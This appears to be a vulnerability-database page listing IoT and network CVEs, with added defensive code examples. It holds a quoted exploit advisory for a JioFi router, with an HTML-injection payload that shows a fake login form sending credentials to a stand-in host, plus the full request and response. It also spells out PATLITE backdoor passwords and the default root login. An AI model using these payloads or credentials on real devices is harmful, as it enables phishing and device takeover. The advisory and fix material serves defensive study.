VARIoT IoT vulnerabilities database


VAR-201903-0016 CVE-2019-6605 Input validation vulnerability in multiple F5 BIG-IP products
CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
On BIG-IP 11.5.1-11.5.8, 11.6.1-11.6.3, and 12.0.x, an undisclosed sequence of packets received by an SSL virtual server and processed by an associated Client SSL or Server SSL profile may cause a denial of service. The flaw is an input validation weakness in the SSL processing path of multiple F5 BIG-IP products; a remote attacker who can reach an affected virtual server can exploit it to put the system into a denial-of-service state. Only SSL virtual servers with a Client SSL or Server SSL profile attached are in the trigger path, so the practical check is to inventory which virtual servers carry those profiles on an affected release. F5 BIG-IP is the application delivery platform of the US company F5 and combines network traffic management, application security management, load balancing and related functions. The advisory lists 11.5.1 through 11.5.8, 11.6.1 through 11.6.3 and 12.0.x as vulnerable; some trackers give the slightly wider ranges 11.5.0 through 11.5.8 and 11.6.0 through 11.6.3.
VAR-201903-0195 CVE-2019-6602 Security feature vulnerability in the login page of multiple F5 BIG-IP products
CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
In BIG-IP 11.5.1-11.5.8 and 11.6.1-11.6.3, the Configuration Utility login page may not follow best security practices when handling a malicious request. The weakness is in a security function of multiple F5 BIG-IP products: a remote attacker can exploit it to bypass certain security restrictions, obtain sensitive information and perform unauthorized actions, which may aid further attacks. Affected releases are BIG-IP 11.5.1 through 11.5.8 and 11.6.1 through 11.6.3. Because the flaw is in the Configuration Utility, exposure is limited to whoever can reach the management interface; that interface should not be reachable from untrusted networks regardless of this issue. F5 BIG-IP is the application delivery platform of the US company F5 and combines network traffic management, application security management, load balancing and related functions.
VAR-201903-1617 CVE-2019-6540 Cryptographic vulnerability (missing encryption) in multiple Medtronic products
CVSS V2: 3.3
CVSS V3: 6.5
Severity: MEDIUM
The Conexus telemetry protocol utilized within Medtronic MyCareLink Monitor versions 24950 and 24952, CareLink Monitor version 2490C, CareLink 2090 Programmer, Amplia CRT-D, Claria CRT-D, Compia CRT-D, Concerto CRT-D, Concerto II CRT-D, Consulta CRT-D, Evera ICD, Maximo II CRT-D and ICD, Mirro ICD, Nayamed ND ICD, Primo ICD, Protecta ICD and CRT-D, Secura ICD, Virtuoso ICD, Virtuoso II ICD, Visia AF ICD, and Viva CRT-D does not implement encryption. An attacker with adjacent short-range radio access to a target product can listen to its communications, including transmissions of sensitive data, so information may be obtained. The products are Medtronic implanted cardiac devices (ICDs and CRT-Ds) and the programmers and home monitors that talk to them over Conexus. Because the protocol applies no cryptographic protection to the link, the attacker needs only a suitable radio within range; combined with the missing authentication and authorization tracked separately as CVE-2019-6538, this lets an attacker bypass the protocol's security mechanism entirely and may lead to further attacks.
VAR-201903-0181 CVE-2019-6538 Access control vulnerability (missing authentication and authorization) in multiple Medtronic products
CVSS V2: 3.3
CVSS V3: 6.5
Severity: MEDIUM
The Conexus telemetry protocol utilized within Medtronic MyCareLink Monitor versions 24950 and 24952, CareLink Monitor version 2490C, CareLink 2090 Programmer, Amplia CRT-D, Claria CRT-D, Compia CRT-D, Concerto CRT-D, Concerto II CRT-D, Consulta CRT-D, Evera ICD, Maximo II CRT-D and ICD, Mirro ICD, Nayamed ND ICD, Primo ICD, Protecta ICD and CRT-D, Secura ICD, Virtuoso ICD, Virtuoso II ICD, Visia AF ICD, and Viva CRT-D does not implement authentication or authorization. An attacker with adjacent short-range access to an affected product, in situations where the product's radio is turned on, can inject, replay, modify, and/or intercept data within the telemetry communication. Because the protocol provides the ability to read and write memory values of the affected implanted cardiac devices, an attacker could exploit it to change memory in an implanted device; information may therefore be tampered with. The precondition to note is the radio state: the attack surface exists only while the device's telemetry radio is active. The products are Medtronic implanted cardiac devices (ICDs and CRT-Ds) and the associated programmers and home monitors. The Conexus Radio Frequency Telemetry Protocol is affected by multiple security vulnerabilities (see also CVE-2019-6540 for the missing encryption); an attacker can exploit them to gain access to sensitive information, bypass the security mechanism and gain unauthorized access, which may lead to further attacks.
VAR-201903-0481 CVE-2019-7441 Input validation (parameter tampering) vulnerability in the WooCommerce PayPal Checkout Payment Gateway plugin for WordPress
CVSS V2: 4.0
CVSS V3: 6.5
Severity: MEDIUM
cgi-bin/webscr?cmd=_cart in the WooCommerce PayPal Checkout Payment Gateway plugin 1.6.8 for WordPress allows parameter tampering in an amount parameter (such as amount_1), as demonstrated by purchasing an item for lower than the intended price. NOTE: the plugin author states that it is true that the amount can be manipulated in the PayPal payment flow; however, the amount is validated against the WooCommerce order total before the order is completed, and if it does not match, the order is left in an "On Hold" state. The practical reading is that the cart parameters the browser sends to PayPal are attacker-controlled by design, so the real control is the server-side reconciliation of what PayPal reports as paid against the stored order total; shop operators should treat "On Hold" orders as unpaid until reviewed rather than fulfilling them. WordPress is a blogging platform developed by the WordPress Foundation in PHP; it supports personal blog sites on PHP and MySQL servers. Generic trackers describe the impact as alteration of application data such as user credentials, permissions, price or item quantity via the amount parameter; the only demonstrated effect is the lowered price.
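The vendor note above names the control that keeps this tampering from costing the shop money: the amount the gateway reports as paid is checked against the stored order total before the order completes. The following is an added illustration of that check in Python; it is not the plugin's code. Order, new_order and reconcile_payment are hypothetical names, and the notification dictionary is a constructed sample that uses the PayPal IPN variable names payment_status, mc_gross, mc_currency and custom; the example assumes the notification's authenticity has already been verified upstream.

```python
from dataclasses import dataclass
from decimal import Decimal, InvalidOperation, ROUND_HALF_UP


@dataclass
class Order:
    """Hypothetical order record: the total is what the shop computed when
    the cart was built, not anything the browser later sent to PayPal."""
    order_id: str
    total: Decimal
    currency: str
    status: str = "pending"


def _money(value):
    """Normalise an amount to two decimal places; None if it is not a number."""
    try:
        return Decimal(str(value)).quantize(Decimal("0.01"), rounding=ROUND_HALF_UP)
    except InvalidOperation:
        return None


def new_order(order_id: str, total: str, currency: str) -> Order:
    return Order(order_id, _money(total), currency)


def reconcile_payment(order: Order, notification: dict) -> Order:
    """Set the order state from a (pre-verified) payment notification.

    The cart parameters the browser sent to PayPal (amount_1, quantity_1, ...)
    are attacker-controlled, so nothing from that redirect is trusted here.
    The gateway's reported gross amount and currency are compared with the
    stored order; any mismatch leaves the order on hold for manual review
    instead of completing it.
    """
    paid = _money(notification.get("mc_gross"))
    if notification.get("payment_status") != "Completed":
        order.status = "pending"          # not paid (yet): nothing to reconcile
    elif notification.get("custom") != order.order_id:
        order.status = "on-hold"          # notification is for a different order
    elif notification.get("mc_currency") != order.currency:
        order.status = "on-hold"          # right number, wrong currency
    elif paid is None or paid != order.total:
        order.status = "on-hold"          # tampered or malformed amount
    else:
        order.status = "processing"       # amounts agree: safe to fulfil
    return order


if __name__ == "__main__":
    # Constructed sample: a 49.99 USD order and a notification whose amount
    # was lowered to 1.00 by editing amount_1 in the PayPal cart URL.
    order = new_order("1001", "49.99", "USD")
    tampered = {"payment_status": "Completed", "mc_gross": "1.00",
                "mc_currency": "USD", "custom": "1001"}
    print(reconcile_payment(order, tampered).status)   # on-hold
```

The comparison is done on Decimal values quantised to cents, so "49.990" and "49.99" agree where a float comparison would be fragile, and a non-numeric amount is treated as a mismatch rather than as zero. The currency check matters as much as the amount check: 49.99 in a weaker currency passes a naive amount-only comparison.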
VAR-201903-0480 CVE-2019-7440 Cross-site request forgery vulnerability in JioFi 4G M2S devices
CVSS V2: 4.3
CVSS V3: 6.5
Severity: MEDIUM
JioFi 4G M2S 1.0.2 devices have CSRF in the SSID name and Security Key fields under Edit Wi-Fi Settings (a SetWiFi_Setting request to cgi-bin/qcmap_web_cgi). A remote attacker who lures an administrator whose browser is logged in to the device into loading a crafted page can cause that browser to submit the request, changing the Wi-Fi SSID and security key with the administrator's privileges; the Wi-Fi settings may therefore be tampered with.
VAR-201903-0478 CVE-2019-7438 Cross-site scripting vulnerability in JioFi 4G M2S devices
CVSS V2: 4.3
CVSS V3: 6.1
Severity: MEDIUM
cgi-bin/qcmap_web_cgi on JioFi 4G M2S 1.0.2 devices has XSS and HTML injection via the mask POST parameter. As the captured exchange below shows, the value of mask is copied unescaped into the JSON-style response body, and the device serves that body with Content-Type: text/html, so a browser renders any injected markup. Information may be obtained and pages may be falsified. The exploit advisory published for this issue follows.

# Exploit Author: Vikas Chaudhary
# Date: 21-01-2019
# Vendor Homepage: https://www.jio.com/
# Hardware Link: https://www.amazon.in/JioFi-Hotspot-M2S-Portable-Device/dp/B075P7BLV5/ref=sr_1_1?s=computers&ie=UTF8&qid=1531032476&sr=1-1&keywords=JioFi+M2S+Wireless+Data+Card++%28Black%29
# Version: JioFi 4G Hotspot M2S 150 Mbps Wireless Router
# Category: Hardware
# Contact: https://www.facebook.com/profile.php?id=100011287630308
# Web: https://gkaim.com/
# Tested on: Windows 10 X64- Firefox-65.0
# CVE-2019-7438
***********************************************************************
## Vulnerability Description
=> HTML injection is an attack that is similar to Cross-site Scripting (XSS). While in the XSS vulnerability the attacker can inject and execute Javascript code, the HTML injection attack only allows the injection of certain HTML tags. When an application does not properly handle user supplied data, an attacker can supply valid HTML code, typically via a parameter value, and inject their own content into the page. This attack is typically used in conjunction with some form of social engineering, as the attack is exploiting a code-based vulnerability and a user's trust.
----------------------------------------
# Proof Of Concept
1- First open BurpSuite
2- Turn intercept on
3- Go to your Wi-Fi router's gateway in the browser [i.e. http://192.168.225.1]
4- Capture the data and then spider the host
5- Now you find a link like this [ http://192.168.225.1/cgi-bin/qcmap_web_cgi ]
6- Send it to Repeater. Now you will find parameters like this [ Page=GetWANInfo&mask=0&token=0 ]
7- Vulnerable parameter is => mask
8- Paste this PAYLOAD in the mask parameter and then show the response in the browser
Payload => <div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:red; padding: 1em;"><h1><font color="white">Please login with valid credentials:- It's A Fake Login Page<br><form name="login" action="http://anysite.com/"><table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td><td><input type="text" name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit" value="Login"/></td></tr></table></form></div>
9- You will see a fake login page on the screen
----------------------------------------------------------------------------------
Vulnerable URL => Post Based => http://192.168.225.1/cgi-bin/qcmap_web_cgi => mask parameter
----------------------------------------------------------------------------------
REQUEST
-------------------
POST /cgi-bin/qcmap_web_cgi HTTP/1.1
Host: 192.168.225.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.225.1/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 550
Connection: close

Page=GetWANInfo&mask=<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:red; padding: 1em;"><h1><font color="white">Please login with valid credentials:- It's A Fake Login Page<br><form name="login" action="http://anysite.com/"><table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td><td><input type="text" name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit" value="Login"/></td></tr></table></form></div>&token=0
****************************
RESPONSE
-----------------
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
X-Frame-Options: SAMEORIGIN
connection: close
Content-Type: text/html
Content-Length: 1167
Date: Mon, 21 Jan 2019 18:02:07 GMT
Server: lighttpd/1.4.35

{"Page":"GetWANInfo","Mask":"<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:red; padding: 1em;"><h1><font color="white">Please login with valid credentials:- It's A Fake Login Page<br><form name="login" action="http://anysite.com/"><table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td><td><input type="text" name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit" value="Login"/></td></tr></table></form></div>","wan_status":"On","total_data_used":"10005648","wan_operation_mode":"NAT","wan_connection_mode":"DHCP","wan_mac":"40:C8:CB:07:2C:8A","host_name":"JMR1140-072C8A","multi_pdn":"Disabled","ipv4_addr":"10.153.220.101","ipv4_subnet":"255.255.255.252","ipv4_gateway":"10.153.220.102","ipv4_primary":"49.45.0.1","ipv4_secondary":"0.0.0.0","ipv6_addr":"2409:4060:218e:b511:89ec:3214:def1:f75b","ipv6_subnet":"64","ipv6_gateway":"fe80::c9b3:928a:5eca:7e1c","ipv6_primary":"2405:200:800::1","ipv6_secondary":"::","channel":"automatic","packet_loss":"0 / 0","total_data_used_dlink":"5.11 MB","total_data_used_ulink":"4.37 MB"}
---------------------------------------------------------------------------------------------------------------
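The captured response above embeds the mask value in a JSON body by plain string concatenation, with no escaping, and labels the body text/html. The following added example, which is neither the advisory author's code nor the device's firmware, models that pattern in Python beside a hardened version. render_wan_info_vulnerable, render_wan_info_safe, is_inert, decoded_mask and the WAN_INFO fields are hypothetical names, and the payload is a shortened, constructed copy of the advisory's.

```python
import json

# Constructed sample: a shortened form of the advisory's fake-login payload.
PAYLOAD = ('<div style="position:absolute;top:0;left:0"><h1>Please login</h1>'
           '<form action="http://anysite.com/"><input name="password"></form></div>')

# Hypothetical status fields, modelled on keys in the captured response.
WAN_INFO = {"wan_status": "On", "wan_connection_mode": "DHCP",
            "ipv4_addr": "10.153.220.101"}


def render_wan_info_vulnerable(mask: str) -> str:
    """Build the body by concatenation, as the captured response suggests the
    device does: the untrusted mask lands between the quotes verbatim, so
    quotes and tags in it are neither escaped nor even valid JSON."""
    fields = ",".join('"%s":"%s"' % (k, v) for k, v in WAN_INFO.items())
    return '{"Page":"GetWANInfo","Mask":"' + mask + '",' + fields + "}"


def render_wan_info_safe(mask: str) -> str:
    """Serialise with json.dumps, then escape <, > and & as \\uXXXX so the
    body stays inert even if a misconfigured server still labels it
    text/html.  The replacements are safe because JSON syntax never uses
    those characters outside string literals."""
    body = json.dumps({"Page": "GetWANInfo", "Mask": mask, **WAN_INFO})
    return (body.replace("<", "\\u003c")
                .replace(">", "\\u003e")
                .replace("&", "\\u0026"))


# Headers the hardened endpoint should send alongside the body.
SAFE_HEADERS = {
    "Content-Type": "application/json; charset=utf-8",  # not text/html
    "X-Content-Type-Options": "nosniff",                 # no MIME sniffing
}


def is_inert(body: str) -> bool:
    """True if the body parses as JSON and carries no raw tag characters,
    i.e. nothing a browser could render even when served as text/html."""
    try:
        json.loads(body)
    except json.JSONDecodeError:
        return False
    return "<" not in body and ">" not in body


def decoded_mask(body: str) -> str:
    """What a JSON consumer sees for Mask: the escaped form round-trips."""
    return json.loads(body)["Mask"]


if __name__ == "__main__":
    print(is_inert(render_wan_info_vulnerable(PAYLOAD)))   # False
    print(is_inert(render_wan_info_safe(PAYLOAD)))         # True
```

The two fixes are independent and both are needed: json.dumps stops the parameter from breaking out of the string literal, and the correct Content-Type with nosniff stops the browser from treating a JSON body as a page in the first place. The extra \u003c escaping is defence in depth for the case where the header fix is lost.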
VAR-201903-0479 CVE-2019-7439 Resource exhaustion (denial of service) vulnerability in JioFi 4G M2S devices
CVSS V2: 6.1
CVSS V3: 6.5
Severity: MEDIUM
cgi-bin/qcmap_web_cgi on JioFi 4G M2S 1.0.2 devices allows a denial of service (device hang) via the mask POST parameter. An attacker who can reach the device's web interface can send a POST request with a crafted mask value to hang the device, interrupting service for connected clients; it is the same endpoint and parameter as the HTML injection tracked as CVE-2019-7438.
VAR-201903-1060 CVE-2018-17167 PrinterOn Enterprise cross-site scripting vulnerability
CVSS V2: 3.5
CVSS V3: 5.4
Severity: MEDIUM
PrinterOn Enterprise 4.1.4 suffers from multiple authenticated stored XSS vulnerabilities via (1) the "Machine Host Name" or "Server Serial Number" field in the clustering configuration, (2) the "name" field in the Edit Group configuration, (3) the "Rule Name" field in the Access Control configuration, (4) the "Service Name" in the Service Configuration, or (5) the First Name or Last Name field in the Edit Account configuration. PrinterOn Enterprise is the secure cloud printing solution of PrinterOn (Canada); it supports printing from laptops, desktops and mobile devices to connected printers. The flaw is caused by insufficient validation of client-supplied data in the web application: an authenticated attacker who stores a payload in one of these fields can have it executed in the browser of another administrator who later views that configuration page, obtaining or altering information. Because the payloads are stored in administrative settings, the attack persists until the offending field is cleaned.
VAR-201903-1631 No CVE File upload vulnerability in Siemens WinCC v7.3
CVSS V2: 6.0
CVSS V3: -
Severity: MEDIUM
Siemens WinCC v7.3 is a process monitoring (SCADA) system. It contains a file upload vulnerability that an attacker can exploit to upload and execute arbitrary programs. No CVE identifier is assigned and no further details are published in this entry.
VAR-201903-1614 CVE-2018-20032 FlexNet Publisher input validation vulnerability
CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
A denial of service vulnerability related to message decoding in the lmgrd and vendor daemon components of FlexNet Publisher version 11.16.1.0 and earlier allows a remote attacker to send a combination of messages to lmgrd or the vendor daemon, causing the heartbeat between lmgrd and the vendor daemon to stop and the vendor daemon to shut down. This is an input validation flaw in FlexNet Publisher; exploiting it puts the license server into a denial-of-service state, so legitimate users cannot check out licenses until the daemon is restarted. Schneider Electric Floating License Manager, which is built on FlexNet Publisher, is affected in version 2.3.0.0 and prior, alongside CVE-2018-20031 and CVE-2018-20034 in the same components.
VAR-201903-1613 CVE-2018-20034 FlexNet Publisher input validation vulnerability
CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
A denial of service vulnerability related to adding an item to a list in the lmgrd and vendor daemon components of FlexNet Publisher version 11.16.1.0 and earlier allows a remote attacker to send a combination of messages to lmgrd or the vendor daemon, causing the heartbeat between lmgrd and the vendor daemon to stop and the vendor daemon to shut down. This is an input validation flaw in FlexNet Publisher; exploiting it puts the license server into a denial-of-service state, so legitimate users cannot check out licenses until the daemon is restarted. Schneider Electric Floating License Manager, which is built on FlexNet Publisher, is affected in version 2.3.0.0 and prior, alongside CVE-2018-20031 and CVE-2018-20032 in the same components.
VAR-201903-1615 CVE-2018-20031 FlexNet Publisher input validation vulnerability
CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
A denial of service vulnerability related to preemptive item deletion in the lmgrd and vendor daemon components of FlexNet Publisher version 11.16.1.0 and earlier allows a remote attacker to send a combination of messages to lmgrd or the vendor daemon, causing the heartbeat between lmgrd and the vendor daemon to stop and the vendor daemon to shut down. This is an input validation flaw in FlexNet Publisher; exploiting it puts the license server into a denial-of-service state, so legitimate users cannot check out licenses until the daemon is restarted. Schneider Electric Floating License Manager, which is built on FlexNet Publisher, is affected in version 2.3.0.0 and prior, alongside CVE-2018-20032 and CVE-2018-20034 in the same components.
VAR-201903-1146 CVE-2018-12638 Bose SoundTouch app cross-site scripting vulnerability
CVSS V2: 4.3
CVSS V3: 6.1
Severity: MEDIUM
An issue was discovered in the Bose SoundTouch app 18.1.4 for iOS. There is no frontend input validation of the device name, so a malicious device name can execute JavaScript in the context of the registered Bose user account once a speaker carrying that name has been connected to the app. This is a cross-site scripting vulnerability in which the untrusted input arrives from the speaker rather than from a web request; information may be obtained or altered.
VAR-201903-0959 CVE-2018-18473 Use of hard-coded credentials in multiple PATLITE products
CVSS V2: 10.0
CVSS V3: 9.8
Severity: CRITICAL
A hidden backdoor on PATLITE NH-FB Series devices with firmware version 1.45 or earlier, NH-FV Series devices with firmware version 1.10 or earlier, and NBM Series devices with firmware version 1.09 or earlier allows attackers to enable an SSH daemon by submitting the "kankichi" or "kamiyo4" password to the _secret1.htm URI. Subsequently the default password root for the root account allows remote code execution and complete takeover of the system. Affected models listed include the PATLITE NBM-D88N, NHL-3FB1 and NHL-3FV1N. This is a use-of-hard-coded-credentials vulnerability: the product lacks an effective trust management mechanism, and because the passwords are fixed in the firmware they cannot be changed by configuration, so an attacker with network access can use them to obtain and alter information and to disrupt service. Until the firmware is updated, exposure is limited only by restricting network access to the devices' web interface and SSH port.
VAR-201903-1002 CVE-2018-14745 Samsung Galaxy S6 buffer error vulnerability
CVSS V2: 5.8
CVSS V3: 8.8
Severity: HIGH
Buffer overflow in prot_get_ring_space in the bcmdhd4358 Wi-Fi driver on the Samsung Galaxy S6 SM-G920F (build G920FXXU5EQH7) allows an attacker who has already obtained code execution on the Wi-Fi chip to overwrite kernel memory, because the driver does not properly validate the ring buffer read pointer. Samsung has confirmed the issue and tracks it as SVE-2018-12029. The Samsung Galaxy S6 is a smartphone made by Samsung of South Korea. The security-relevant point is the trust boundary: the read pointer is supplied from the chip side of the host-chip ring, and the host driver uses it without checking that it lies within the ring, so a compromised chip can steer the host into writing outside the buffer. The result is kernel memory corruption: information may be obtained or altered and service may be disrupted, and since the precondition is code execution on the Wi-Fi chip, the bug turns a compromise of the chip firmware into a compromise of the host kernel.
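The following added example models the missing check in Python. It is a hypothetical simplification of a host-side ring shared with a peripheral, not code from the bcmdhd driver or from Samsung: HostRing, simulate, RING_ITEMS, ITEM_LEN and GUARD are names invented for the example, and the "kernel memory" is a constructed byte array laid out so that the bytes after the ring are visible.

```python
RING_ITEMS = 8                      # slots in the ring
ITEM_LEN = 16                       # bytes per slot
RING_BYTES = RING_ITEMS * ITEM_LEN
GUARD = b"K" * 64                   # stands in for kernel data placed after the ring


class HostRing:
    """Host-side view of a message ring whose read index is written by the
    peripheral (hypothetical).  With check_pointer=False the index is used
    as received; with True it is range-checked first."""

    def __init__(self, check_pointer: bool):
        self.check_pointer = check_pointer
        self.mem = bytearray(RING_BYTES) + bytearray(GUARD)

    def ring_space(self, rd: int, wr: int) -> int:
        """Free slots between the host write index and the peripheral's read
        index, with wraparound.  Modular arithmetic makes a wild rd look
        plausible here, which is why the raw value must be range-checked
        before it is ever turned into an address."""
        return (rd - wr - 1) % RING_ITEMS

    def slot_offset(self, index: int) -> int:
        """Byte offset of a slot.  The check below is the one the advisory
        says was missing: an index taken from the chip must lie in the ring."""
        if self.check_pointer and not 0 <= index < RING_ITEMS:
            raise ValueError("peripheral-supplied ring index out of range: %r" % index)
        return index * ITEM_LEN

    def write_slot(self, index: int, payload: bytes) -> None:
        off = self.slot_offset(index)
        self.mem[off:off + ITEM_LEN] = payload.ljust(ITEM_LEN, b"\0")[:ITEM_LEN]

    def guard_intact(self) -> bool:
        return bytes(self.mem[RING_BYTES:]) == GUARD


def simulate(chip_rd: int, check_pointer: bool) -> dict:
    """The chip reports read index chip_rd; the host computes the free space
    from it and then writes a message into the slot that index selects.
    Returns the computed space, whether the write was refused and whether
    the memory after the ring survived."""
    ring = HostRing(check_pointer)
    space = ring.ring_space(chip_rd, 0)
    try:
        ring.write_slot(chip_rd, b"A" * ITEM_LEN)
        rejected = False
    except ValueError:
        rejected = True
    return {"rejected": rejected, "guard_intact": ring.guard_intact(), "space": space}


if __name__ == "__main__":
    print(simulate(RING_ITEMS + 1, check_pointer=False))   # guard overwritten
    print(simulate(RING_ITEMS + 1, check_pointer=True))    # write refused
```

The space calculation returns a sensible-looking value for any integer, so a driver that validates only the derived quantities never notices a corrupted index; the check has to be on the raw chip-written value, and it has to happen before that value is multiplied into an offset.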
VAR-201903-1226 CVE-2018-4003 CUJO Smart Firewall buffer error vulnerability
CVSS V2: 7.5
CVSS V3: 9.8
Severity: CRITICAL
An exploitable heap overflow vulnerability exists in the mdnscap binary of the CUJO Smart Firewall running firmware 7003. String lengths are handled incorrectly when parsing character strings in mDNS resource records, leading to arbitrary code execution in the context of the mdnscap process. An unauthenticated attacker can trigger the vulnerability by sending a crafted mDNS message; no user interaction is required. Information may be obtained or altered and service may be disrupted. The CUJO Smart Firewall is a home smart firewall device from CUJO.
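The flaw class named above, a length field in a resource-record string trusted past the end of the buffer, is what a parser for mDNS TXT records must guard against at two levels: the record's RDLENGTH against the packet, and each <character-string> length octet against the RDATA. The following is an added example of such a parser in Python, not CUJO's mdnscap code; MalformedRdata, parse_txt_record, parse_txt_rdata and parse_txt_rdata_unchecked are names invented here, and the sample records are constructed.

```python
import struct


class MalformedRdata(ValueError):
    """Raised when a length field claims bytes that are not in the buffer."""


def parse_txt_rdata(rdata: bytes) -> list:
    """Split TXT RDATA into its <character-string>s (RFC 1035: one length
    octet, then that many bytes), refusing a length that overruns RDATA."""
    strings = []
    pos, end = 0, len(rdata)
    while pos < end:
        length = rdata[pos]
        pos += 1
        if pos + length > end:                 # the check that must not be skipped
            raise MalformedRdata("length octet %d at offset %d exceeds the %d "
                                 "remaining bytes" % (length, pos - 1, end - pos))
        strings.append(bytes(rdata[pos:pos + length]))
        pos += length
    return strings


def parse_txt_rdata_unchecked(rdata: bytes) -> list:
    """The same loop without the check.  In C the copy of `length` bytes
    would read past the packet buffer; Python slicing merely truncates, so
    the bug shows up here only as silently wrong output."""
    strings = []
    pos = 0
    while pos < len(rdata):
        length = rdata[pos]
        pos += 1
        strings.append(bytes(rdata[pos:pos + length]))
        pos += length
    return strings


def parse_txt_record(packet: bytes, rdlength_offset: int):
    """Read the 16-bit RDLENGTH at rdlength_offset, check that the RDATA it
    announces lies inside the packet, then parse the strings.  Returns
    (True, strings) or (False, reason)."""
    try:
        if rdlength_offset + 2 > len(packet):
            raise MalformedRdata("RDLENGTH field is truncated")
        (rdlength,) = struct.unpack_from("!H", packet, rdlength_offset)
        start = rdlength_offset + 2
        if start + rdlength > len(packet):
            raise MalformedRdata("RDLENGTH %d runs past the end of the packet" % rdlength)
        return True, parse_txt_rdata(packet[start:start + rdlength])
    except MalformedRdata as exc:
        return False, str(exc)


# Constructed samples: a well-formed TXT RDATA and one whose second length
# octet (0xff) claims 255 bytes when only 11 follow.
GOOD_RDATA = b"\x09txtvers=1\x0bpath=/index"
BAD_RDATA = b"\x09txtvers=1\xffpath=/index"


if __name__ == "__main__":
    print(parse_txt_record(b"\x00\x16" + GOOD_RDATA, 0))
    print(parse_txt_record(b"\x00\x16" + BAD_RDATA, 0))
    print(parse_txt_rdata_unchecked(BAD_RDATA))          # truncated, no error
```

Both checks are needed because they bound different things: RDLENGTH is compared against the packet so the record itself cannot extend past the datagram, and each string length is compared against the remaining RDATA so a single octet cannot pull bytes from the next record or from beyond the buffer.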
VAR-201906-0117 CVE-2019-5300 Digital signature verification bypass vulnerability in multiple Huawei routers
CVSS V2: 4.6
CVSS V3: 6.7
Severity: MEDIUM
There is a digital signature verification bypass vulnerability in the AR1200, AR1200-S, AR150, AR160, AR200, AR2200, AR2200-S, AR3200, SRG1300, SRG2300 and SRG3300 Huawei routers. The affected software improperly verifies the digital signature of the software image on the device, so a local attacker with high privileges can bypass the integrity check for software images and install a malicious software image on the device. Once a forged image is accepted, information may be obtained or altered and service may be disrupted; the precondition is already-privileged local access, which is why the CVSS V3 score is moderate despite the full-control outcome. Huawei AR1200 is an enterprise router of Huawei (China). Affected versions:
AR1200, AR1200-S, AR150, AR160, AR200, AR2200, AR2200-S and AR3200: V200R007C00, V200R008C20, V200R008C50, V200R009C00 and V200R010C00.
SRG1300, SRG2300 and SRG3300: V200R007C00, V200R008C50, V200R009C00 and V200R010C00.
VAR-201903-1428 CVE-2018-1992 Buffer error vulnerability in multiple IBM Power 9 products
CVSS V2: 6.9
CVSS V3: 6.4
Severity: MEDIUM
The bootloader of the IBM Power 9 OP910, OP920 and FW910 boot firmware is responsible for loading and validating the initial boot firmware image that drives the rest of the system's hardware initialization. The bootloader contains a buffer overflow such that, if an attacker were able to replace the initial boot firmware image with a very carefully crafted and sufficiently large malicious replacement, loading that image could cause the bootloader to overwrite its own instruction memory and thereby circumvent secure boot protections, install trojans and so on. IBM X-Force ID: 154345; IBM has confirmed the vulnerability. The notable point is that the overflow sits in the component whose job is to validate the image: the attacker does not need a valid signature, because the oversized image corrupts the validating code during the load, before the check can fail, so the root of trust is subverted at its first link. The precondition is the ability to write the boot firmware image, which requires local, privileged access. IBM Power System S922 and other Power-processor-based servers of IBM (USA) are affected; information may be obtained or altered and service may be disrupted.
VAR-201903-0357 CVE-2019-1716 Input validation vulnerability in Cisco IP Phone 7800 Series and Cisco IP Phone 8800 Series products
CVSS V2: 7.5
CVSS V3: 9.8
Severity: CRITICAL
A vulnerability in the web-based management interface of the Session Initiation Protocol (SIP) Software for Cisco IP Phone 7800 Series and Cisco IP Phone 8800 Series could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition or execute arbitrary code. The vulnerability exists because the software improperly validates user-supplied input during user authentication. An attacker could exploit it by connecting to an affected device over HTTP and supplying malicious user credentials; because the flaw is in the authentication step itself, no valid account is needed. A successful exploit could allow the attacker to trigger a reload of the device, resulting in a DoS condition, or to execute arbitrary code with the privileges of the app user. Cisco fixed this vulnerability in the following SIP Software releases: 10.3(1)SR5 and later for the Cisco Unified IP Conference Phone 8831; 11.0(4)SR3 and later for the Cisco Wireless IP Phone 8821 and 8821-EX; and 12.5(1)SR1 and later for the rest of the Cisco IP Phone 7800 Series and 8800 Series. Cisco tracks the issue as bug IDs CSCvn56168, CSCvn72540 and CSCvo05687.